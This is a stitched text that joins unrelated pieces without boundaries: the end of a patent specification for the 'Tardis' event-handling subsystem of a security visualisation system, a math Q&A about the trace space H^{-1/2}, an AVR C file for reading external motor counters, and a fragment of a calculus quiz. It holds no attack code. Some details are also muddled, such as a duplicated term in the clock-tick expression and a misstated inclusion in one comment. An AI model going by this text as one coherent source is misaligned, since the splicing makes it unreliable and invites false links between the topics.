In order to store an event, X Threads first look up the event id in a Slot Mapping Array. This returns an index to the array of Slots. The Slot contains all the entities the X Thread needs to perform its operations (indices, lock, Guaranteed Cell Pool, unify flag etc.). With this information, the X Thread can obtain and populate the Event Cell and required Data Cells. The X Thread can also insert the Event Cell in the Slot's queue after getting hold of the lock for that Slot (as there could be multiple X Threads trying to insert Event Cells in the same Slot's queue). The event queue for each Slot is time-ordered (based on each Event Cell's timestamp). The last Event Cell in the queue has the largest timestamp; the first in the queue has the smallest. The event queue is represented by the first and last Event Cell indices.
The event lists shown in FIG. 29 have their roles switch between the read and write lists each update. These lists are represented by an index to the first Event Cell in the list (the oldest). The lists are separated (broken) from the queue by clearing the index pointers between the newest event in the list and the oldest event in the queue. Hence the Y Threads merely manipulate Slot and Event Cell indices.
When a switch occurs at the end of an update, the event list nominated as the write list becomes the read list (from which Monitors can access the events) and the event list nominated as the read list becomes the write list (which Y Threads will manipulate during the next update).
The event lists are strictly controlled via several variables for each Slot. These define:
• 1. The maximum number of events allowed in an event list.
• 2. The maximum number of unified events allowed in an event list.
• 3. The maximum number of non-unified events allowed in an event list.
The variables are adhered to in the order of the potential events. Table 1 below gives some examples for a potential event queue of: “U, U, N, U, N”, with the last event at the head:
TABLE 1

Max Events  Max Unified  Max Non Unified  Added Unified  Added Non Unified
 1           1            1                0              1
10          10            0                3              0
 5           5            5                3              2
 4           3            3                2              2
 3           2            2                1              2
The three variables provide flexible control over the lists. Similarly, there are variables accessible via CCI to monitor the demand for places in an event list (from queued events), and the events which get into an event list (listed events).
Initially, max events is 1, max unified is 1 and max non unified is 1, as in the case of the first example in the table above. This gives behaviour similar to that of Tardis 2.1, where only one event can be made available to Monitors per update, and it is the first potential event in the event queue.
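By way of illustration only, the following C++ sketch applies the three limits to the potential events walked from the head of the queue; with this order and skipping behaviour the sketch reproduces the figures of Table 1. The processing order is inferred from those examples and is therefore an assumption.

    #include <cstddef>
    #include <utility>
    #include <vector>

    enum class EventClass { Unified, NonUnified };

    struct ListLimits
    {
        int maxEvents;       // maximum number of events allowed in an event list
        int maxUnified;      // maximum number of unified events
        int maxNonUnified;   // maximum number of non-unified events
    };

    // Walk the potential events from the head of the queue, admitting each one
    // only while its class limit and the overall limit have not been reached.
    // Returns the number of unified and non-unified events admitted.
    std::pair<int, int> admit(const std::vector<EventClass>& potentialFromHead,
                              const ListLimits& limits)
    {
        int unified = 0, nonUnified = 0;
        for (std::size_t i = 0; i < potentialFromHead.size(); ++i) {
            if (unified + nonUnified >= limits.maxEvents)
                break;                                          // event list is full
            if (potentialFromHead[i] == EventClass::Unified && unified < limits.maxUnified)
                ++unified;
            else if (potentialFromHead[i] == EventClass::NonUnified && nonUnified < limits.maxNonUnified)
                ++nonUnified;                                   // otherwise the event is skipped
        }
        return std::make_pair(unified, nonUnified);
    }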
For an event that is received by the Tardis, it can “leave” the Tardis in one of three ways:
Discarded—An event is discarded if it is never considered for placing into an event list. This could be because an X Thread determined it could discard the event, that is, not insert it in an event queue. An event is also discarded if it is placed in a queue, but subsequent changes to the Slot's unify flag and a subsequent call to clear the queue out resulted in it being discarded.
Expired—The event made it into an event queue, but was removed by a Y Thread from the event queue because it did not meet the criteria to get into a read list and synthetic time passed it by (non unified).
Listed—The event made it into an event queue and into a read list and was made available to Monitors. Eventually it was cleared out of a write list.
4.3.1 Guaranteed Cell Pools
The Cell Pool holds a Guaranteed Cell Pool dedicated for each Slot as well as the Shared Cell Pool, which it uses to store the incoming events and data. When a cell (event or data) is required for a Slot, the Slot's Guaranteed Cell Pool Manager is used. If the Guaranteed Cell Pool Manager is unable to supply a cell (ie. it has no free cells), it attempts to get a cell from the Shared Cell Pool Manager.
The total number of cells allocated on start-up by the Cell Pool (Ntc) is given by the following formula:
Ntc=(Ngc*Ns)+Nsc where,
• Ngc is the number of guaranteed cells per Slot, ie. per Guaranteed Cell Pool
• Ns is the number of Slots, and
• Nsc is the number of shared cells within the Shared Cell Pool.
The Shared Cell Pool and the Guaranteed Cell Pools behave in the same way: they maintain a linked list of free cells, and they have a lock for accessing that list. Each cell has a Cell Pool Manager pointer so that it can be returned to the appropriate Cell Pool Manager's free cell list.
Hence no entity in the Tardis needs to make a distinction between a guaranteed cell and a shared cell.
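A minimal C sketch of this allocation policy is given below; the type and function names are assumptions for illustration, and the per-pool locking is omitted.

struct cell;

struct cell_pool_manager {
    struct cell *free_list;            /* linked list of free cells */
};

struct cell {
    struct cell_pool_manager *owner;   /* pool manager to return the cell to */
    struct cell *next;
};

static struct cell *pool_get(struct cell_pool_manager *m)
{
    struct cell *c = m->free_list;
    if (c)
        m->free_list = c->next;
    return c;
}

static struct cell *cell_alloc(struct cell_pool_manager *guaranteed,
                               struct cell_pool_manager *shared)
{
    struct cell *c = pool_get(guaranteed);   /* first choice: the Slot's Guaranteed Cell Pool */
    if (!c)
        c = pool_get(shared);                /* fall back to the Shared Cell Pool */
    return c;                                /* may be null if both pools are exhausted */
}

static void cell_free(struct cell *c)
{
    c->next = c->owner->free_list;           /* return the cell to its originating pool */
    c->owner->free_list = c;
}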
5. Tardis Clock
A Tardis Clock is a process, which sends clock tick commands to the Tardis' Synthetic Time CCI server. This action triggers an update in the Tardis and provides the mechanism for the Tardis to move through synthetic time and make events available to Monitors. The rate at which clock ticks are received by the Tardis in real time is the update rate in real time. It should be noted that if the Tardis' synthetic time window is less than the Tardis Clock's period, then it is possible that the Tardis' synthetic time could move ahead of real time.
5.1 Clock Ticks
Clock ticks occur when a set of rules defined by a virtual FPGA (Field Programmable Gate Array) is satisfied. The input to the FPGA is a word in binary form, where each bit corresponds to the availability of a clock event for that bit position.
The FPGA is shown in FIG. 29, with the table representing the fuse bits shown below along with the resulting clock tick expression:
tick=(A & C) or (A & B & C) or (C) or (A & B & C)
The fuse bits allow rules to be applied to the input word bits (A, B, C, . . . ) to determine whether a clock tick should occur. A fuse bit of 1 means it is not blown and the relevant bit is input to the relevant AND gate. The results are combined by an OR gate. If a row of fuse bits is not needed then the fuse bits should all be 0.
A table of clock event counters (Table 2) is also maintained, as shown below. When a clock event with a certain ID is received, the clock event count for that event is incremented. When a clock tick occurs, all clock event counters are decremented (but cannot be less than zero). A bit of the FPGA input word is set if the corresponding counter is non-zero:
TABLE 2
Clock Event ID   Clock Event Counter   FPGA Input Word (I)
0                4                     1
1                1                     1
2                0                     0
3                1                     1
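The counter handling can be sketched in C as follows; the names are assumptions for this example.

#include <stdint.h>

static uint16_t clock_event_count[64];

static void on_clock_event(unsigned id)      /* a clock event with this ID was received */
{
    clock_event_count[id]++;
}

static void on_clock_tick(void)              /* a clock tick has just occurred */
{
    for (int i = 0; i < 64; i++)
        if (clock_event_count[i] > 0)
            clock_event_count[i]--;          /* counters never drop below zero */
}

static uint64_t fpga_input_word(void)        /* bit i is set while counter i is non-zero */
{
    uint64_t w = 0;
    for (int i = 0; i < 64; i++)
        if (clock_event_count[i] != 0)
            w |= (uint64_t)1 << i;
    return w;
}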
If each row of fuse bits is considered a binary word (W1, W2, W3, . . . ) then a rule will fail if:
• rule fail = !I & W
So a tick should not occur when:
• tick fail = (!I & W1) & (!I & W2) & (!I & W3)
Therefore a tick should occur when:
• tick = !((!I & W1) & (!I & W2) & (!I & W3))
This can be evaluated very quickly. Note that since it is assumed that the Tardis is built for a 64-bit architecture, we can allow for 64 unique clock event IDs and as many rules as required. If we allow for n rules, the fuse bit table uses n 64 bit words.
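A C sketch of the evaluation is shown below: a rule passes when every input bit its fuse word requires is present, and a tick occurs as soon as one rule passes. The function and variable names are assumptions for this example.

#include <stdint.h>
#include <stddef.h>

static int clock_tick(uint64_t input_word, const uint64_t *fuse_words, size_t n_rules)
{
    for (size_t i = 0; i < n_rules; i++) {
        /* Rule i fails if any bit required by fuse word Wi is missing
         * from the input word, i.e. (!I & Wi) is non-zero. */
        if ((~input_word & fuse_words[i]) == 0)
            return 1;    /* at least one rule satisfied: tick */
    }
    return 0;            /* every rule failed: no tick */
}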
Event IDs are allocated to clock event sources via CCI, which can also be used as a mechanism to modify the FPGA fuse bit table and the clock event counters.
6. Monitors
Monitors connect to the shared memory segment created by the Tardis on start-up. This allows the Monitors to be able to read data from the Tardis Store, such as the read lists that have just been processed by the Tardis. Note that they may use a Tardis Store Proxy to do this.
The Monitors need to wait until a switch has occurred, and they need to be able to detect a subsequent switch if one comes before they finish reading from the read list.
To do this, the Monitors wait for the update counter to change, indicating a switch. They then read all the data they require from the array, making local copies. They can verify the integrity of the data by checking that the timestamp has not changed.
This is required every time data is read from the array. Even if the timestamp has not changed, if a pointer is then used to get data, the timestamp needs to be checked again to ensure that the pointer hasn't been de-referenced. This means that a Monitor should collect all the data it needs from shared memory first, and then act on that data once its integrity has been verified.
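The read-verify-retry loop can be sketched in C as follows; the variable names and polling strategy are assumptions for this example.

#include <string.h>
#include <stdint.h>
#include <stddef.h>

static void monitor_read(volatile const uint32_t *update_counter,
                         volatile const uint32_t *slot_timestamp,
                         const void *shared_data, void *local_copy, size_t size)
{
    uint32_t last_update = *update_counter;

    for (;;) {
        while (*update_counter == last_update)
            ;                                  /* wait for the next switch (poll or sleep) */
        last_update = *update_counter;

        uint32_t stamp = *slot_timestamp;
        memcpy(local_copy, shared_data, size); /* copy everything needed out of shared memory */
        if (*slot_timestamp == stamp)
            break;                             /* copy is consistent; safe to act on it */
        /* The timestamp changed while copying: discard the copy and try again. */
    }
}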
There may be many different types of Monitors, but they need to get data from the Tardis in a similar way.
7. Clients
7.1 Overview
Clients communicate with the Tardis via Input Portal Connections. The Tardis' Z Threads almost continuously check for new Clients so they can accept new Input Portal Connections.
Connections can be made through different Input Portals, so the Tardis may have Clients sending events via sockets, and other paths, such as via shared memory.
The user and the Clients can request the number of available Input Portals, the type of available Input Portals, their identifiers and the details for available Input Portals from the Tardis via CCI, and then establish connections on a specific Input Portal (as specified by type and identifier). An identifier is preferably an ordered data value associated with the event by the Client. In a preferred embodiment it may be an integer within a range of natural numbers.
There may be many different types of Clients, but they need to send data to the Tardis in a similar way.
Tardis Appendix/Glossary
A.1 Tardis
The Tardis is the event handling sub-system for Shapes Vector. The Tardis receives events from Tardis Clients and stores the events in shared memory for Tardis Monitors to read.
A.2 Tardis Monitor
Tardis Monitors are the event observation sub-systems for Shapes Vector. They read and process the events made available for Monitors by the Tardis.
A.3 Tardis Client
Tardis Clients connect to the Tardis and send events through an Input Portal Connection. The Input Portal can be of several different types, such as a socket connection or shared memory.
A.4 Input Portal
An Input Portal is an object representing a conduit through which events are sent to the Tardis. Each Input Portal can have multiple Input Portal Connections that are specific connections through an Input Portal through which a single Client sends events to the Tardis. Each Input Portal has a type and an identifier.
A.5 Mutex
Mutexes are mutual exclusion locks that prevent multiple threads from simultaneously executing critical sections of code, which access shared data.
A.6 Semaphore
A semaphore is a non-negative integer count and is generally used to coordinate access to resources. The initial semaphore count is set to the number of free resources, then threads increment and decrement the count as resources are added and removed. If the semaphore count drops to zero, which means no available resources, threads attempting to decrement the semaphore will block until the count is greater than zero.
A.7 X Threads (Event Processing Threads)
X Threads are responsible for obtaining a new event from the Input Portal Connections and processing the event by storing it in the Tardis Store. They also detect timed out Input Portal Connections.
A.8 Y Threads (Array Managing Threads)
Y Threads are responsible for updating the lists of events to be read by the Monitors. They do so by manipulating Slot and Event Cell indices for event queues. Y Threads are each responsible for updating the event queue for a specified range of Slots.
A.9 Z Threads
Z Threads are responsible for accepting new connection requests from new Clients and creating new Input Portal Connections. These Input Portal Connections are added to a list, which is added to the M Thread's list when the Z Threads are waiting.
A.10 Guarantee
Guarantees are a set of pre-allocated Event/Data Cells (created upon start-up), used as the first choice of storage area for events and data for each Slot.
Tardis Features Summary
TARDIS features specifically include:
• 1. A set of slots where each semantic is associated with a unique slot. No slot is reused as the system evolves.
• 2. A slot logic, which allows for flexible handling of prioritised events.
• 3. A synthetic clock which can be set to tick in a flexible user-specified manner.
• 4. A taxonomy superimposed over the slots in order to group and catalogue like semantics
It will be appreciated by those skilled in the art, that the inventions described herein are not restricted in their use to the particular application described. Neither are the present inventions restricted in their preferred embodiments with regard to particular elements and/or features described or depicted herein. It will be appreciated that various modifications can be made without departing from the principles of these inventions. Therefore, the inventions should be understood to include all such modifications within their scope.
Part 1 SHAPES VECTOR 1
1 Shapes Vector Introduction 1
2 Architectural Components 6
2.1 Primary Functional Architecture 6
2.1.1 Configuration Interface and I/O Sub-system 6
2.1.2 Sensors 7
2.1.3 Intelligent Agent Architecture 8
2.1.3.1 Knowledge Base 8
2.1.3.2 Intelligent Agents and Ontologies 9
2.1.4 The Tardis 10
2.1.5 Monitor 10
2.2 The Hardware 11
2.3 System Software 12
3 The “Classical” Visualisation Paradigm 13
3.1 Geo View 15
3.2 Data View 18
4 Intelligent Agents 23
4.1 Agent Architecture 24
4.2 Inferencing Strategies 26
4.2.1 Traditional 26
4.2.2 Vectors 27
4.3 Other Applications 31
5 Synthetic Stroboscopes and Selective Zoom 32
5.1 Synthetic Strobes 32
5.2 Selective Zoom 34
6 Temporal Hierarchies 36
6.1 Strobes Revisited 36
6.2 User Information Overload 37
6.3 Data Streams and IA's 37
7 Other Visualisation Efforts 38
7.1 NetPARS 39
7.2 Security Visualisation 41
7.3 Network Visualisation 41
7.4 Data Mining 42
7.5 Parentage and Autograph 43
Appendix Part 1 - Custom Control Environments for Shapes Vector 44
A.1 Strategic Environment 45
A.2 Tactical Environment 45
PART 2 SHAPES VECTOR MASTER ARCHITECTURE 47
1. Introduction 47
1.1 Shapes Vector Master Architecture 47
1.2 Precis of this part of the specification 48
2. The Agent Architecture 49
2.1 Agent Architecture 50
2.2 A Note on the Tardis 53
3. Inferencing Strategies 54
3.1 Traditional 54
3.2 Possiblistic 55
3.3 Vectors 56
3.4 Inferencing for Computer Security Applications 60
3.5 Other Applications 63
4. Rules for Constructing an Agent 63
5. Agents and Time 65
5.1 Data Streams and IA's 65
5.2 Temporal Event Mapping for Agents 67
6. Implications for Higher Level Agents 68
7. Higher Level Ontologies 69
7.1 Level 2 69
7.1.1 Relationships 70
7.1.2 Interrogative Operators 72
7.2 Level 3 and Above 75
7.3 An Example of Possiblistic Querying 76
7.4 An Example of the Use of Consistency 78
8. User Avatars 79
9. Further Comments on the Architecture 80
10.1 AAFID 81
10.2 Comparison with the Bass' Comments 82
11. A Multi-Abstractional Framework for Shapes Vector Agents 83
11.1 Concepts 84
12. Summary 87
Part 3 DATA VIEW SPECIFICATION 90
1. Data View Specification 90
1.1 Universe 90
1.2 Objects 92
1.3 Aggregate Objects 93
1.4 Object Selector 95
1.5 Mass, Charge and Flavours 96
1.6 Forces 98
1.7 Phantoming 98
1.8 Markers 99
1.9 Radius of Influence Display 100
1.10 Pulses 100
1.11 Irregular Functions 100
Part 4 GEO VIEW SPECIFICATION 102
1. Introduction 102
1.1 Identification 102
1.2 System Overview 102
1.2.1 General 102
1.2.2 Geo View Module Scope 103
1.3 Overview 103
2. Referenced Documents 104
2.1 Standard 104
3. Module-wide Design Decisions 104
3.1 Design decisions and goals of Geo View 104
4. Module Architectural Design 105
4.1 Geo View Functional Design 106
4.1.1 Geo View General 106
4.1.1.1 Event Handling 106
4.1.1.2 MasterTable Functionality 107
4.1.1.3 CCI Interface 107
4.1.1.4 GeoView Processing and Caching 108
4.1.2 LayoutHierarchy 111
4.1.2.1 Class Hierarchy 111
4.1.2.2 Logical Object Hierarchy 112
4.1.2.3 Processing 114
4.1.3 Layout Structure Template Library (LSTL) 117
4.1.3.1 GenericGraph 117
4.1.3.2 GenericLine 118
4.1.3.3 GenericMatrix 118
4.1.3.4 GenericRing 119
4.1.3.5 GenericStar 119
4.1.3.6 GenericRectangle 120
4.1.3.7 GenericTree 120
4.2 Concept of Execution 121
4.3 Interface Design 121
5. Module Detailed Design 121
5.1 Geo View Classes 121
5.1.1 Geo View Class Summary 121
5.2 LayoutHierarchy Classes 122
5.2.1 LayoutHierarchy Class Summary 122
5.2.2 Event Insertion and Removal Methods 124
5.2.2.1 cfInsert 124
5.2.2.2 Adding Inverse Attributes 124
5.2.2.3 NetworkObject Insertion 125
5.2.2.4 Attribute Insertion 125
5.2.3 Layout Rule Application Methods 126
5.2.3.1 applyLayoutStructureRulesToObject 126
5.2.3.2 applyAttachedToRulesToObject 128
5.2.3.3 applyLocatedInRulesToObject 129
5.2.3.4 findSatisfiedRules 129
5.2.3.5 composeObjects 130
5.2.4 Leaf Edge Creation Methods 131
5.2.4.1 createEdges 131
5.2.4.2 createEdge 132
5.2.4.3 updateEdges 132
5.2.4.4 addEdge 133
5.2.4.5 addGEdge 133
5.3 LayoutStructureTemplateLibrary (LSTL) Classes 133
5.3.1 LSTL Template Class Summary 133
5.3.2 GenericGraph Methods 134
5.3.2.1 Node Separation Factor 134
5.3.2.2 Rank Separation Factor 134
5.3.2.3 Orientation 134
5.3.3 GenericLine Methods 134
5.3.3.1 Axis 134
5.3.3.2 Linear Direction 134
5.3.3.3 Origin 135
5.3.3.4 Separation 135
5.3.4 GenericMatrix Methods 135
5.3.4.1 Width Separation 135
5.3.4.2 Depth Separation 135
5.3.4.3 Delete Policy 135
5.3.4.4 Origin Policy 136
5.3.5 GenericRing Methods 136
5.3.5.1 Angular Direction 136
5.3.5.2 Radius 136
5.3.5.3 Separation 136
5.3.6 GenericStar Methods 137
5.3.6.1 Root Height 137
5.3.7 GenericRectangle Methods 137
5.3.7.1 Angular Direction 137
5.3.7.2 Start Side 137
5.3.7.3 Width Separation 137
5.3.7.4 Depth Separation 137
5.3.7.5 Width 138
5.3.7.6 Depth 138
5.3.8 LSTL Class Interface 138
5.3.8.1 Memory Allocation 139
5.3.8.2 Relative Placement 139
5.3.9 T Interface 139
6. Appendix for GeoView 140
7.1 Abbreviations 140
7.2 Definition of Terms 141
Part 5 TARDIS SPECIFICATION 143
1. Tardis Specification 143
1.1 Introduction 143
1.2 Assumptions 144
2. Overview of the Tardis 144
2.1 Components 145
2.2 Overview of Operation 146
3. Tardis Concepts 146
3.1 Events 146
3.2 TimeStamp 148
3.3 Shared Memory 149
3.4 Time 149
3.4.1 Universal Time 149
3.4.2 Synthetic Time 150
3.5 Process and Thread Activity 150
4. Functional Overview of the Tardis 151
4.1 Tardis Threads 151
4.2 Tardis Operation 153
4.3 Tardis Store 155
4.3.1 Guaranteed Cell Pools 157
5. Tardis Clock 158
5.1 Clock Ticks 159
6. Monitors 160
7. Clients 161
7.1 Overview 161
Tardis Appendix/Glossary 162
A.1 Tardis 162
A.2 Tardis Monitor 162
A.3 Tardis Client 162
A.4 Input Portal 162
A.5 Mutex 163
A.6 Semaphore 163
A.7 X Threads (Event Processing Threads) 163
A.8 Y Threads (Array Managing Threads) 163
A.9 Z Threads 164
A.10 Guarantee 164
Tardis Features Summary 164
Claims defining the invention are as follows: 171
Patent Citations
Cited PatentFiling datePublication dateApplicantTitle
US5434978Feb 18, 1994Jul 18, 1995International Business Machines CorporationCommunications interface employing unique tags which enable a destination to decode a received message structure
US5555354Mar 23, 1993Sep 10, 1996Silicon Graphics Inc.Method and apparatus for navigation within three-dimensional information landscape
US5778157Jun 17, 1996Jul 7, 1998Yy Software CorporationSystem and method for expert system analysis using quiescent and parallel reasoning and set structured knowledge representation
US5790789Aug 2, 1996Aug 4, 1998Suarez; LarryMethod and architecture for the creation, control and deployment of services within a distributed computer environment
US5801696Jul 27, 1995Sep 1, 1998International Business Machines Corp.Message queue for graphical user interface
US5802296Aug 2, 1996Sep 1, 1998Fujitsu Software CorporationSupervisory powers that provide additional control over images on computers system displays to users interactings via computer systems
US5907328Aug 27, 1997May 25, 1999International Business Machines CorporationAutomatic and configurable viewpoint switching in a 3D scene
US5973678Aug 29, 1997Oct 26, 1999Ford Global Technologies, Inc.Method and system for manipulating a three-dimensional object utilizing a force feedback interface
US6034692Aug 1, 1997Mar 7, 2000U.S. Philips CorporationVirtual environment navigation
US6064984Aug 29, 1996May 16, 2000Marketknowledge, Inc.Graphical user interface for a computer-implemented financial planning tool
US6222547Feb 7, 1997Apr 24, 2001California Institute Of TechnologyMonitoring and analysis of data in cyberspace
US6831640 *Feb 26, 2003Dec 14, 2004Sensable Technologies, Inc.Systems and methods for sculpting virtual objects in a haptic virtual reality environment
US6839663 *Sep 29, 2000Jan 4, 2005Texas Tech UniversityHaptic rendering of volumetric soft-bodies objects
US6853965 *Nov 16, 2001Feb 8, 2005Massachusetts Institute Of TechnologyForce reflecting haptic interface
US6867707 *Apr 24, 2002Mar 15, 2005Elster Electricity, LlcAutomated on-site meter registration confirmation using a portable, wireless computing device
WO1999044160A1Mar 1, 1999Sep 2, 1999Sabre Group IncMethods and apparatus for accessing information from multiple remote sources
WO2001015017A1Aug 25, 2000Mar 1, 2001Lg Electronics IncVideo data structure for video browsing based on event
WO2001093599A2May 26, 2001Dec 6, 2001Wisengine IncMethod and apparatus for unified query interface for network information
WO2002088925A1Apr 30, 2002Nov 7, 2002Commw Of AustraliaA data processing and observation system
WO2002088926A1Apr 30, 2002Nov 7, 2002Commw Of AustraliaAn event handling system
WO2002088927A1Apr 30, 2002Nov 7, 2002Commw Of AustraliaGeographic view of a modelling system
WO2002088988A1Apr 30, 2002Nov 7, 2002Commw Of AustraliaData processing architecture
Non-Patent Citations
Reference
1Bass, T. (Apr. 2000). "Intrustion Detection Systems & Multisensor Fusion: Creating Cyberspace Situational Awareness," Communications of the ACM 43(4):99-105.
2Spafford, E. and Zanboni, D. (2000). "Intrusion Detection Using Autonomous Agents," Journal of Computer Networks 34: 547-570.
Classifications
U.S. Classification345/473
International ClassificationG06F3/14, H04L12/24, G06T11/20, G06T15/00, G06F17/50
Cooperative ClassificationG06F11/328, G06T2200/24, H04L41/046, H04L41/0686, G06F17/5045, G06F11/3495, G06F2201/86, H04L41/22, G06T11/206
European ClassificationH04L41/22, H04L41/06F, G06T11/20T, G06F17/50D, G06F11/32S6, G06F11/34T12, G06F11/34M
Legal Events
DateCodeEventDescription
Mar 21, 2003ASAssignment
Owner name: COMMONWEALTH OF AUSTRALIA, THE, AUSTRALIA
Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNORS:ANDERSON, MARK STEPHEN;ENGELHARDT, DEAN CRAWFORD;MARRIOTT, DAMIAN ANDREW;AND OTHERS;REEL/FRAME:014286/0234
Effective date: 20021125
Sep 15, 2009FPAYFee payment
Year of fee payment: 4
Nov 22, 2013REMIMaintenance fee reminder mailed
Apr 11, 2014LAPSLapse for failure to pay maintenance fees
Jun 3, 2014FPExpired due to failure to pay maintenance fee
Effective date: 20140411
Arising as the traces of $H(div; \Omega)$, I am wondering if the space $H^{-1/2}(\partial \Omega)$ has any regularity properties? (Containment in BV would be wonderful, although I doubt it holds.) It seems difficult to find anything in the literature.
Of course not. For instance, it contains $L^2(\partial\Omega)$. By definition, $H^{-1/2}(\partial\Omega)$ is the dual of $H^{1/2}(\partial\Omega)$. If $\Omega$ is $n$-dimensional $n\ge3$, then $\partial\Omega$ is $(n-1)$-dimensional and $H^{1/2}(\partial\Omega)\subset L^p(\partial\Omega)$ by Sobolev injection, for every $p\le\frac{2(n-1)}{n-3}$ ($<+\infty$ if $n=3$) and therefore $H^{-1/2}(\partial\Omega)$ contains $L^{p'}$. But you cannot say much more. If $s>\frac n2$, then $H^s(\Omega)\subset C^0(\overline\Omega)$ and therefore $H^{\frac12-s}(\partial\Omega)$ is contained in the set of bounded measures. But this does not apply to $H^{-\frac12}$, even if $n=2$ (thanks to A. Rekalo). Actually, a use of the Uniform Boundedness Principle tells us that there exists an element of $H^{-\frac12}(\partial\Omega)$ that is not a bounded measure.
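In display form, the duality argument in the first paragraph is simply
$$H^{1/2}(\partial\Omega)\hookrightarrow L^{p}(\partial\Omega)\ \text{ for } p\le\tfrac{2(n-1)}{n-3}\quad\Longrightarrow\quad L^{p'}(\partial\Omega)\hookrightarrow \bigl(H^{1/2}(\partial\Omega)\bigr)^{*}=H^{-1/2}(\partial\Omega).$$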
@Andrey. I acknowledge my mistake about continuity (I'll edit). But I maintain that $H^{-1/2}$ contains $L^2$, just because $L^2\subset H^{1/2}$. – Denis Serre Dec 3 '12 at 11:41
@Denis Serre: Sorry, my reading skills are horrible today. I misread your statement (as if you wrote that $H^{-1/2}$ is contained in $L^2$). Stupid me. – Andrey Rekalo Dec 3 '12 at 12:26
no problem. This happens to me too. And I know that it is easier to see two mistakes when there is at least one for sure. – Denis Serre Dec 3 '12 at 14:32
Ok, a further question: What if we have $div \phi \equiv 1$ on $\Omega$? (Or up to a set of measure $\epsilon$.) Can we then get extra regularity for the normal trace?
path: root/digital/mimot/src/dirty/counter_ext.avr.c
/* counter_ext.avr.c - External counter support. */
/* asserv - Position & speed motor control on AVR. {{{
*
* Copyright (C) 2008 Nicolas Schodet
*
* APBTeam:
* Web: http://apbteam.org/
* Email: team AT apbteam DOT org
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* }}} */
#include "common.h"
#include "counter.h"
#include "modules/utils/utils.h"
#include "modules/math/fixed/fixed.h"
#include "io.h"
/**
* This file add support for an external counter like the hdlcounter or
* avrcounter project. This can be better in order not to loose steps and
* support more counters.
*/
/** Define the first auxiliary counter address. */
#define COUNTER_AUX0 0
/** Define the second auxiliary counter address. */
#define COUNTER_AUX1 1
/** Define to 1 to reverse the first auxiliary counter. */
#define COUNTER_AUX0_REVERSE 0
/** Define to 1 to reverse the second auxiliary counter. */
#define COUNTER_AUX1_REVERSE 0
/** First auxiliary counter shift. */
#define COUNTER_AUX0_SHIFT 1
/** Second auxiliary counter shift. */
#define COUNTER_AUX1_SHIFT 1
/** Define to 1 to use the AVR External Memory system, or 0 to use hand made
* signals. */
#define COUNTER_USE_XMEM 0
/** Last values. */
static uint16_t counter_aux_old[AC_ASSERV_AUX_NB];
/** New values, being updated by step update. */
static int16_t counter_aux_new_step[AC_ASSERV_AUX_NB];
/** Last raw step values */
static uint8_t counter_aux_old_step[AC_ASSERV_AUX_NB];
/** Overall counter values. */
uint16_t counter_aux[AC_ASSERV_AUX_NB];
/** Counter differences since last update.
* Maximum of 9 significant bits, sign included. */
int16_t counter_aux_diff[AC_ASSERV_AUX_NB];
#if !COUNTER_USE_XMEM
# define COUNTER_ALE_IO B, 4
# define COUNTER_RD_IO D, 6
#endif
/** Read an external counter. */
static inline uint8_t
counter_read (uint8_t n)
{
#if COUNTER_USE_XMEM
uint8_t * const ext = (void *) 0x1100;
return ext[n];
#else
uint8_t v;
PORTA = (PORTA & 0xf0) | (n & 0x0f);
IO_CLR (COUNTER_ALE_IO);
PORTA &= 0xf0;
DDRA &= 0xf0;
DDRB &= 0xf0;
IO_CLR (COUNTER_RD_IO);
utils_nop ();
utils_nop ();
v = (PINA & 0x0f) | (PINB & 0x0f) << 4;
IO_SET (COUNTER_RD_IO);
IO_SET (COUNTER_ALE_IO);
DDRA |= 0x0f;
DDRB |= 0x0f;
return v;
#endif
}
/** Initialize the counters. */
void
counter_init (void)
{
#if COUNTER_USE_XMEM
/* Long wait-states. */
XMCRA = _BV (SRW11);
/* Do not use port C for address. */
XMCRB = _BV (XMM2) | _BV (XMM1) | _BV (XMM0);
/* Long wait-states and enable. */
MCUCR |= _BV (SRE) | _BV (SRW10);
#else
IO_SET (COUNTER_ALE_IO);
IO_SET (COUNTER_RD_IO);
IO_OUTPUT (COUNTER_ALE_IO);
IO_OUTPUT (COUNTER_RD_IO);
PORTA &= 0xf0;
PORTB &= 0xf0;
DDRA |= 0x0f;
DDRB |= 0x0f;
#endif
/* Begin with safe values. */
counter_aux_old_step[0] = counter_read (COUNTER_AUX0);
counter_aux_old_step[1] = counter_read (COUNTER_AUX1);
}
/** Update one step. If counters are not read fast enough, they could
* overflow, call this function often to update step counters. */
void
counter_update_step (void)
{
uint8_t aux0, aux1;
int8_t diff;
/* Sample counters. */
aux0 = counter_read (COUNTER_AUX0);
aux1 = counter_read (COUNTER_AUX1);
/* Update step counters. */
diff = (int8_t) (aux0 - counter_aux_old_step[0]);
counter_aux_old_step[0] = aux0;
counter_aux_new_step[0] += diff;
diff = (int8_t) (aux1 - counter_aux_old_step[1]);
counter_aux_old_step[1] = aux1;
counter_aux_new_step[1] += diff;
}
/** Update overall counter values and compute diffs. */
void
counter_update (void)
{
/* Wants fresh data. */
counter_update_step ();
/* First auxiliary counter. */
uint16_t aux0 = counter_aux_new_step[0];
aux0 &= 0xffff << COUNTER_AUX0_SHIFT; /* Reset unused bits. */
#if !COUNTER_AUX0_REVERSE
counter_aux_diff[0] = (int16_t) (aux0 - counter_aux_old[0]);
#else
counter_aux_diff[0] = (int16_t) (counter_aux_old[0] - aux0);
#endif
counter_aux_diff[0] >>= COUNTER_AUX0_SHIFT;
counter_aux_old[0] = aux0;
counter_aux[0] += counter_aux_diff[0];
/* Second auxiliary counter. */
uint16_t aux1 = counter_aux_new_step[1];
aux1 &= 0xffff << COUNTER_AUX1_SHIFT; /* Reset unused bits. */
#if !COUNTER_AUX1_REVERSE
counter_aux_diff[1] = (int16_t) (aux1 - counter_aux_old[1]);
#else
counter_aux_diff[1] = (int16_t) (counter_aux_old[1] - aux1);
#endif
counter_aux_diff[1] >>= COUNTER_AUX1_SHIFT;
counter_aux_old[1] = aux1;
counter_aux[1] += counter_aux_diff[1];
}
Computing Derivatives: What's in a Slope? True or False
1. Let f(x) = e. Then -> f'(x) = 0
2. What is the derivative of f(x) = 5x + 6?
